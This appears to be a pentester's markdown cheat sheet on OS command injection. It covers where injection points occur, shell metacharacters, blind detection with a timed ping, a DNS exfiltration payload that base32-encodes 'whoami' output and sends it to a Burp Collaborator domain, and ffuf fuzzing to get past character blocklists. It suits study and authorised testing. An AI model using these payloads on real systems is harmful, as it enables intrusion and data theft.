cmd-injection.md

Cmd Injection

Where Would You Find Command Injection

• In the following places:
• Text boxes that take in input
• Hidden URLs that take input
• E.g. /execute/command-name
• Or through queries e.g. /location?parameter=command
• When using URLs, remember to URL encode the characters that aren’t accepted
• Hidden ports:
• Some frameworks open debug ports that take in arbitrary commands

Overview

• Use command line symbols within the input to alter the executed command
• Pay close attention to functions within an application that tend to be performed by an OS command
• Two forms exist, blind command injection --> you do not see the returned output, and non-blind cmd injection --> the system command output gets returned back to you
• Ensure you use the proper system commands per the OS

cat vs type 
ping -c vs ping -n #ping -n causes an infinte ping loop in linux
ls vs dir

• Try to start with reading a world readable file

Non-Blind CMD Inj.

• At the most basic level:
• Use command line symbols within the input to alter the executed command
• Once you have identified a potential injection point, use command line symbols within the input to alter the executed command

; | || & && > >>

• Once you have exploited non-blind cmd injection, escalate to a reverse shell.

Blind CMD Injection

Identification

• ICMP and DNS are useful to determine blind cmd injection

google.com; ping -c11 127.0.0.1 #server will hang for roughly 10 seconds

• Can also try to ping yourself, however many corporate environments have firewalls in place to stop this, so doesn't always mean blind cmd injection isn't taking place
• Use tcpdump to capture the icmp echo requests.

• This proves blind cmd injection, escalate to reverse shell

Burp Collaborator

• Launch Burp, and choose:

Burp --> Burp Collaborator Client
Press --> "Copy to Clipboard" #to copy a randomly generated domain name
Execute your cmd injection

• Press Poll Now to see if the request came through

• If the above worked, move down to Data Exfil section

Data Exfil via DNS and Burp Collaborator

• Once you have your Burp Collaborator Domain, try your command injection

google.com; a=$(whoami|base32|tr -d =); nslookup $a.COLLAB_DOMAIN_NAME.com

• Press Poll now and you should have something returned like this:

O53XOLLEMF2GCCQ.323lijijf90304jklksjru43k23.oastify.com

• Then type the following in your local terminal

echo -n O53XOLLEMF2GCCQ | wc -c

• If this fails as Invalid Base32 add 1, or 2 equal signs at the end for padding

echo -n O53XOLLEMF2GCCQ= | base32 -d
#output:
www-data

Bypassing Character Blocklist with ffuf

• If you see that some special characters are banned, create a burp request to the resource you want to test
• It should be a post request
• Identify the parameter that it is using to post the data to the server

name=;ls

• Swap out the command injection attempt that is getting blocked in the burp request with:

name=FUZZ

• Save the burp request to your local machine in a file

ffuf -request search.request --request-proto http -w /opt/Seclists/Fuzzing/special-chars.txt

• You usually will have to ignore the & character as many webservers will think you are going to pass in another parameter
• Now that you have your results back you must filter out the most common side that you see being returned
• -fs 724
• Can comma seperate filter size i.e. you see alot of 724 and 726 returned saying that character you posted is blocked
• -fs 724,726
• Ensure you also -mc all or match code to see all the different http status codes returned, look for 5XX errors
• If you see errors on:

{ == SSTI
; | & == cmd injection
' " == SQLI